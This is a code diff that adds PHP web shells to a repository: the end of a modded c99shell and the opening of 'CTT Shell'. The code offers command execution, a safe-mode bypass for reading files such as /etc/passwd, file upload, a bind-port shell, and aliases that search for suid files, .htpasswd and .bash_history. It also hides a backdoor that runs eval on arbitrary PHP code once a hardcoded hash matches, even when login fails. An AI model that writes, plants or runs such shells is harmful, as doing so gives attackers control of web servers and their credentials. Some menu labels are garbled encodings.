+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_asp"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_mp3"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
+"RYtMAgEAOw==",
+"ext_cmd"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_cpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
+"Eq7YrLDE7a4SADs=",
+"ext_ini"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_diz"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_doc"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
+"ext_exe"=>
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+"xhIAOw==",
+"ext_h"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
+"Wq/NknbbSgAAOw==",
+"ext_hpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
+"UqUagnbLdZa+YFcCADs=",
+"ext_htaccess"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_html"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_jpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_js"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+"a00AjYYBbc/o9HjNniUAADs=",
+"ext_lnk"=>
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_php"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
+"ext_pl"=>
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7"
+ );
+ //For simple size- and speed-optimization.
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
    ");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "
    ";
+  foreach ($k as $u) {echo $u.":
    ";}
+  echo "
    ";
+ }
+ exit;
+}
+if ($act == "about") {echo "
    Credits:
    Idea, leading and coding by tristram[CCTeaM].
    Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].
    Thanks all who report bugs.
    All bugs send to tristram's ICQ #656555 .    ";}
+?>
+
    
+
+
    :: Command execute ::
    Enter: 
     
    Select: 
     
    
+
    
+
+
+
+  
+  
+
    :: Shadow's tricks :D  ::
    
+    
    Useful Commands 
+    
    
+    
    
+      
    
+        
+        
+          
+        
+         
+        
+          
    
+        Warning. Kernel may be alerted using higher levels 
    
+    
    
+    
    
+   
    Kernel Info: 
    
+      
+      
+	  
+	  
+	  
+	  
+    
    
+    

    
+
+
+
+  
+  
+
    :: Preddy's tricks :D  ::
    
+    
    Php Safe-Mode Bypass (Read Files)
+    

    
+    
    
+      
    
+      File:  

     eg: /etc/passwd
    
+      
+      
+      
+           
+      
+      
+      Trying To Get File $get
    ";
+	if(copy("compress.zlib://".$file, $temp)){
+	$fichier = fopen($temp, "r");
+	$action = fread($fichier, filesize($temp));
+	fclose($fichier);
+	$source=htmlspecialchars($action);
+	echo "
    Start $get

    $source

    Fin $get    ";
+	unlink($temp);
+	} else {
+	die("
    Sorry... File
+	".htmlspecialchars($file)." dosen't exists or you don't have
+	access.
    ");
+			}
+	echo "
    ";
+	}
+	
+	if(isset($_GET['file']))
+{
+rsg_read();
+}
+	
+	?>
+	
+	$chemin
    ";
+foreach ($files as $filename) {
+	echo "
    ";
+   echo "$filename\n";
+   echo "
    ";
+}
+}
+
+if(isset($_GET['directory']))
+{
+rsg_glob();
+}
+
+?>
+
+          
    
+      
    
+    
    
+    
    
+   
    Php Safe-Mode Bypass (List Directories):     
    
+      

    
+      Dir:  

     eg: /etc/
    
+
+    
    
+    

    
+
+
+ 
+ 
+
+
    :: Search ::
      - regexp 
    :: Upload ::
     
    
+
    :: Make Dir ::
     
    :: Make File ::
     
    
+
    :: Go Dir ::
     
    :: Go File ::
     
    
+
    --[ c99shell v.  Modded by Shadow & Preddy | RootShell Security Group | Generation time:  ]--
    
+ 
+ 
diff --git a/php/C99madShell v. 2.0 madnet edition.php b/php/C99madShell v. 2.0 madnet edition.php
new file mode 100644
index 0000000..8d95cd4
--- /dev/null
+++ b/php/C99madShell v. 2.0 madnet edition.php	
@@ -0,0 +1,7 @@
+
\ No newline at end of file
diff --git a/php/CTT Shell.php b/php/CTT Shell.php
new file mode 100644
index 0000000..1d60088
--- /dev/null
+++ b/php/CTT Shell.php	
@@ -0,0 +1,2927 @@
+array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
+ "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar")
+);
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$nixpwdperpage = 9999;
+$bindport_pass = "ctt";
+$bindport_port = "11457";
+$aliases = array();
+$aliases[] = array("-----------------------------------------------------------", "ls -la");
+$aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
+$aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
+$aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
+$aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
+$aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
+$aliases[] = array("find config* files", "find / -type f -name \"config*\"");
+ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
+$aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
+$aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
+$aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
+$aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
+$aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
+$aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
+$aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
+$aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
+$aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
+$aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
+$aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
+$aliases[] = array("show opened ports", "netstat -an | grep -i listen");
+$sess_method = "cookie";
+$sess_cookie = "ctshvars";
+if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
+$sess_file = $tmpdir."ctshvars_".$sid.".tmp";
+$usefsbuff = true;
+$copy_unset = false;
+$quicklaunch = array();
+$quicklaunch[] = array("",$sul);
+$quicklaunch[] = array("","#\" onclick=\"history.back(1)");
+$quicklaunch[] = array("","#\" onclick=\"history.go(1)");
+$quicklaunch[] = array("",$sul."act=ls&d=%upd");
+$quicklaunch[] = array("","");
+$quicklaunch[] = array("",$sul."act=fsbuff&d=%d");
+$quicklaunch1 = array();
+$quicklaunch1[] = array("Ïğîöåññû",$sul."act=ps_aux&d=%d");
+$quicklaunch1[] = array("Ïàğîëè",$sul."act=lsa&d=%d");
+$quicklaunch1[] = array("Êîìàíäû",$sul."act=cmd&d=%d");
+$quicklaunch1[] = array("Çàãğóçêà",$sul."act=upload&d=%d");
+$quicklaunch1[] = array("Áàçà",$sul."act=sql&d=%d");
+$quicklaunch1[] = array("PHP-Êîä",$sul."act=eval&d=%d");
+$quicklaunch1[] = array("PHP-Èíôî",$sul."act=phpinfo\" target=\"blank=\"_target");
+$quicklaunch1[] = array("Ñàì óäàëÿşò",$sul."act=selfremove");
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+@$f = $_GET[f];
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
+if(!ini_get("register_globals")) {import_request_variables("GPC");}
+$starttime = getmicrotime();
+if (get_magic_quotes_gpc())
+{
+if (!function_exists("strips"))
+{
+ function strips(&$el)
+ {
+  if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}}  }
+  else {$el = stripslashes($el);}
+ }
+}
+strips($GLOBALS);
+}
+$tmp = array();
+foreach ($host_allow as $k=>$v) {$tmp[]=  str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+
+
+if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
+elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
+if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
+{
+ header("WWW-Authenticate: Basic realm=\"CTT SHELL\"");
+ header("HTTP/1.0 401 Unauthorized");if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
+ exit;
+}  
+
+$lastdir = realpath(".");
